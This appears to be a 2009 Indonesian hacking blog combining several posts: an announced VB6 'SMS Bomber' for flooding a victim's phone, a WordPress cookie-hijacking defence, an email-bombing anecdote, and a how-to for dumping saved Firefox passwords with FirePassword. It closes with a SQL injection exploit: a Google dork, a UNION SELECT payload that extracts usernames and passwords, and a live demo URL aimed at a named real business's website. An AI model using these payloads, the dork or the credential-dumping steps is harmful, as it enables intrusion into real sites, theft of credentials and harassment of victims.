[[*]] – Blogz nya YaDoY666 – [[*]]

Setelah beberapa waktu yang lalu saya membahas tentang SMS Control dengan memanfaatkan Gammu, pada kesempatan kali ini saya coba membahas tentang SMS Bomber. Sms bomber kali ini merupakan pengembangan dari artikel saya sebelum nya “Control Your Machine With SMS”.

Yang dimaksud dengan SMS Bomber adalah sebuah program komputer yang di program untuk melakukan pengiriman SMS secara terus-menerus dalam jumlah yang telah kita tentukan sebelumnya.  Efek dari SMS Bomber sangat berbahaya karna selain mengganggu sang korban yang handphone nya akan berbunyi dan getar-getar terus, SMS Bomber juga dapat menyebabkan Handphone target akan hang dan restart. Oleh karna itu saya tegaskan disini, “Saya tidak bertanggung jawab atas akibat yang ditimbulkan oleh artikel ini. USE IT WITH YOUR OWN RISK.”

Untuk membuat SMS Bomber ini saya menggunakan Visual Basic 6.0, dan masih memanfaatkan Gammu untuk send & recieve sms dari handphone. Didalam SMS Bomber saya ini telah saya tambahkan sedikit trik untuk melewati SMS Firewall yang terdapat pada beberapa handphone (beberapa handphone produksi china telah dilengkapi SMS Firewall). Thank to StardustMemory for the Idea.

Untuk menggunakan SMS Bomber ini, komputer anda harus terinstall MySQL dan Gammu, baca artikel saya sebelum nya tentang untuk melakukan konfigurasi & menjalankan Gammu, tanpa MySQL & Gammu yang terpasang di komputer anda, SMS Bomber ini tidak akan dapat bekerja.

Download Source Code nya disini

[[*]] Disclaimer [[*]]

Penulis tidak bertanggung jawab atas segala akibat yang ditimbulkan oleh artikel ini. Semua akibat yang ditimbulkan tanggung jawab masing-masing individu. USE IT WITH YOUR OWN RISK.

Cookie adalah serangkaian teks yang disimpan pada komputer Anda oleh situs web yang Anda kunjungi. Pada umumnya cookie menyimpan pengaturan atau preferensi Anda untuk suatu situs web tertentu, misalnya bahasa yang dipilih, atau lokasi (negara) Anda. Ketika Anda kembali ke situs web tersebut, Browser akan mengirimkan cookie yang bersesuaian kepada situs web yang bersangkutan. Dengan cara ini, situs dapat menampilkan informasi yang sesuai dengan pengaturan atau preferensi Anda.

Cookie dapat menyimpan berbagai jenis informasi, termasuk di antaranya informasi pribadi seperti nama, alamat rumah, alamat email, atau nomor telepon Anda. Akan tetapi informasi ini hanya akan disimpan jika Anda pernah memberikan informasi ini kepada situs tersebut. Situs web tidak dapat mengakses informasi yang tidak pernah Anda berikan kepada situs web tersebut, dan situs web juga tidak dapat mengakses berkas lainnya pada komputer Anda. Secara bawaan (default), aktivitas menyimpan dan mengirim cookie tidak pernah terlihat oleh pengguna

Cookie Hijacking adalah satu metoda yang digunakan para hacker untuk melakukan penetrasi dengan cara melakukan pencurian cookie.  Berikut penjelasan tentang Cookie Hijacking yang saya ambil dari wikipedia.

During normal operation cookies are sent back and forth between a server (or a group of servers in the same domain) and the computer of the browsing user. Since cookies may contain sensitive information (user name, a token used for authentication, etc.), their values should not be accessible to other computers. Cookie theft is the act of intercepting cookies by an unauthorized party.

Cookies can be stolen via packet sniffing in an attack called session hijacking. Traffic on a network can be intercepted and read by computers on the network other than its sender and its receiver (particularly on unencrypted public Wi-Fi networks). This traffic includes cookies sent on ordinary unencrypted http sessions. Where network traffic is not encrypted, malicious users can therefore read the communications of other users on the network, including their cookies, using programs called packet sniffers.

Mencegah Cookie Hijacking pada Wordpress dapat dilakukan dengan cara yang sangat simple yaitu dengan cara mengenkrip cookie nya. Bagaimana cara mengenkrip cookie pada wordpress? Untuk melakukan nya buka file wp-config.php anda  lalu cari beberapa baris ini pada file tersebut

define(’AUTH_KEY’, ‘put your unique phrase here’);
define(’SECURE_AUTH_KEY’, ‘put your unique phrase here’);
define(’LOGGED_IN_KEY’, ‘put your unique phrase here’);
define(’NONCE_KEY’, ‘put your unique phrase here’);

Lalu buka link berikut ini http://api.wordpress.org/secret-key/1.1/ dan kopi isi dari file tersebut yang di generate secara otomatis oleh wordpress, kemudian ganti 4 baris diatas dengan apa yang sudah kita kopi tadi, kemudian save file tersebut.

Dan Gotcha…!!!

Wordpress yang anda miliki telah aman dari Cookie Hijacking.  Simple sekali bukan? Trik ini dapat digunakan untuk Wordpress versi 2.6.0 atau versi yang lebih tinggi.

Referensi : http://en.wikipedia.org/wiki/HTTP_cookie

Beberapa waktu yang lalu ada kejadian yang sangat lucu yang udah saya alami. Apa itu kejadian lucu tersebut? Yah ada seseorang yang mengaku berasal dari hmGaySecurity telah mendaftarkan email saya ke beberapa newsletter. Entah apa maksud orang tersebut mendaftarkan email saya ke sebuah newsletter,  setelah saya cari tau mengapa orang tersebut mendaftarkan email saya ke beberapa newletter saya mendapatkan jawaban nya. Apa itu jawaban nya?

Ya, tujuan orang tersebut tidak lain dan tidak bukan adalah percobaan untuk membuat inbox email saya penuh dan akhir nya menjadi rusak karna sudah terlalu banyak email yang masuk ke dalam inbox saya.  Istilah yang biasa dipakai oleh para h4×0r adalah email bomber.

Dengan spontan, saya tertawa geli setelah tau maksud dan tujuan orang tersebut melalukan mail bomber dengan cara yang teramat sangat bodoh. Kenapa bodoh, yah jelas bodoh, karna setiap newsletter pada umumnya selalu memberikan fasilitas untuk unsubcribe. Jika sudah di unsubcribe yah jelas email-email tersebut tidak akan dikirim lagi ke saya. Hahahahaha… Apakah  mereka tidak mampu membuat sebuah mail bomber sehingga harus menggunakan trik yang sangat bodoh tersebut.

Hey, maling,  please go home, washing ur foot, and then sleep. Dont forget to drink a glass of milk.  Hahahaha

Firefox adalah sebuah browser yang sangat populer dipakai oleh pala netter. Di dalam Firefox terdapat fitur untuk mengingat password-password untuk berbagai site yang telah kita kunjungi.  Firefox akan selalu menawarkan untuk menyimpan password-password yg telah kita masukan. Fasilitas ini sangat berguna terutama bagi kita yang sangat malas untuk mengingat-ingat  bermcam-macam password yang kita miliki. Namun dibalik segala manfaat nya tersebut, fasilitas ini sangat beresiko yang luar biasa besar bagi kita. Firefox sendiri telah melakukan upaya  agar password tersebut tersimpan dengan aman. Yang dilakukan oleh firefox untuk mengamankan password yang disimpan adalah dengan cara mengenkripnya kedalam sebuah file.  File tersebut memiliki extension *.txt untuk firefox dengan versi dibawah 3.5 dan *.sqllite untuk firefox diatas versi 3.5. Untuk versi  3.5 kebawah firefox memberi nama file tersebut dengan  nama signons2.txt untuk firefox versi 2 dan signons3.txt  untuk firefox versi 3, sedangkan untuk versi 3.5 keatas firefox memberikan nama signons.sqlite.  File-file tersebut dapat kita temukan pada firefox porfile directory. (C:\Documents and Settings\[NamaUser]\Application Data\Mozilla\Firefox\Profiles\[berbeda-beda tiap komputer].default).

Kini dengan bantuan sebuah program kecil dan portable, seorang attacker dapat dengan mudah nya mendapatkan username dan password yang kita simpan dengan menggunakan fasilitas yang telah disediakan oleh firefox. Nama program tersebut adalah firepass. Firepass diciptakan oleh seorang ahli reverse engneering bernama Nagareshwar Y Talekar. Firepass sendiri dibuat dengan menggunakan bahasa C. Firepass dapat di download pada http://www.securityxploded.com/firepassword.php

Berikut saya berikan cara menggunakan program tersebut.

[1]     Download dan ekstrak program tersebut
[2]    Jalankan program tersebut melalui command prompt
FirePassword.exe [-m "master password" ] <Firefox_Profile_Directory>
Options:
-m  = master password

Gotcha…!!!!
Hanya dalam hitungan detik, attacker sudah berhasil mendapatkan semua password yang tersimpan.  Hanya karena sebuah kemalasan anda untuk mengingat semua password yang anda miliki harus dibayar dengan harga yang sangat mahal. Oleh karena itu jangan pernah MALAS untuk mengingat-ingat semua password yang anda miliki

————————————————————————————————————————————————————-

Author          : YaDoY666

Contact         : YaDoY666[a]ServerIsDown[dot]Org

Group            : ServerIsDown

Date              : September 27th, 2009

————————————————————————————————————————————————————-

[-]  Dork

[+] “catalog/details.asp?id=” or use your own keyword

[-] Exploit

[+]  details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] POC

http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Demo Live

http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Greetz

Jack-, Don Tukuleso, XShadow, Kecemplungkalen, v3nom, indounderground, mistersaint, m3g4tr0n, gblack, miya666, ServerIsDown, Mainhack Brotherhood, Indonesian Coder, You.

- Proud To Be Indonesian -

[*] Cepet sembuh yah mi, Luph you always [*]